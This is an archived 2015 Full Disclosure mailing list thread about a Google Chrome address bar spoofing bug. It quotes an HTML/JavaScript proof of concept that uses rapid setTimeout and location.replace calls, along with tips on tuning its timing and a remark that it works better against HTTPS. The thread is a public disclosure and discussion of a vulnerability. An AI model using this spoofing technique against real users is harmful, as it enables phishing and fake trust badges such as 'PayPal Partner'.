lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 01 Jul 2015 14:39:14 +0100
From: David Leo <>
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!
Daniel Micay said:
"It does display a window with the address"
"why you've got an ever increasing number of setTimeout events"
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy(it works and we don't touch it anymore)
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
And Chrome
(A number is displayed in Chrome's address bar,
not the same as Opera)
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.

In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"

Kind Regards,

We love clever tricks.
We love this:

On 2015/6/30 7:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make display "We love Islamic State" :-)
> Note:
> No user interaction on the fake page.
> Code:
> ***** index.html
> <script>
> function next()
> {
>      w.location.replace(''+n);n++;
>      setTimeout("next();",15);
>      setTimeout("next();",25);
> }
> function f()
> {
>"content.html","_blank","width=500 height=500");
>      i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT</b>
> <script>location="";</script>
> ***** It's online
> (The page says "June/16/2015" - it works as we tested today)
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
> Kind Regards,
> PS
> We love clever tricks.
> We love this:

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists